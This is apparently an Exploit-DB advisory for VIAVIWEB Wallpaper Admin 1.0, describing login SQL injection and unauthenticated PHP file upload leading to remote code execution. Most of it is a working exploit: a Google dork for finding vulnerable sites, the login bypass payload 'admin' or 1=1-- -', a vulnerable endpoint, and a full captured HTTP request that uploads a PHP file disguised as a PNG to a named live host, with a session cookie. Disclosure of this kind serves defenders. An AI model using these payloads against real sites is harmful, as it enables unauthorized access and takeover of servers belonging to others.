VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities

vendor:

VIAVIWEB Wallpaper Admin 1.0

by:

Edd13Mora

9.8

CVSS

CRITICAL

SQL Injection and Remote Code Execution

89, 94

CWE

Product Name: VIAVIWEB Wallpaper Admin 1.0

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 11, Kali Linux

2022

VIAVIWEB Wallpaper Admin 1.0 – Multiple Vulnerabilities

VIAVIWEB Wallpaper Admin 1.0 is vulnerable to SQL Injection and Remote Code Execution. An attacker can inject malicious SQL queries into the login page and can execute arbitrary code on the server by uploading a malicious file.

Mitigation:

Input validation should be done on the server-side to prevent SQL Injection. File uploads should be restricted to certain file types and the server should be configured to reject malicious files.

Source

Exploit-DB raw data:

# Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
# Google Dork: intext:"Wallpaper Admin"   "LOGIN" "password" "Username"
# Date: [18/09/2022]
# Exploit Author: [Edd13Mora]
# Vendor Homepage: [www.viaviweb.com]
# Version: [N/A]
# Tested on: [Windows 11 - Kali Linux]

------------------
SQLI on the Login page
------------------
payload --> admin' or 1=1-- -
---
POC:
---
[1] Disable JavaScript on ur browser put the payload and submit
[2] Reactive JavaScript and resend the request
---------------------------
Authenticated SQL Injection:
---------------------------
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]
-----------------------------------------------
Remote Code Execution (RCE none authenticated):
-----------------------------------------------
Poc:
----
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes
--------------------
Burp Request :
--------------------

POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
Host: http://googlezik.freehostia.com
Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
Content-Length: 467
Origin: http://googlezik.freehostia.com
Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="category_id"

1
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: image/png

<?php phpinfo(); ?>
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="submit"


-----------------------------33893919268150571572221367848--


Uploaded File can be found here :
--------------------------------
http://localhost/PAth-Where-Script-Installed/categories/
```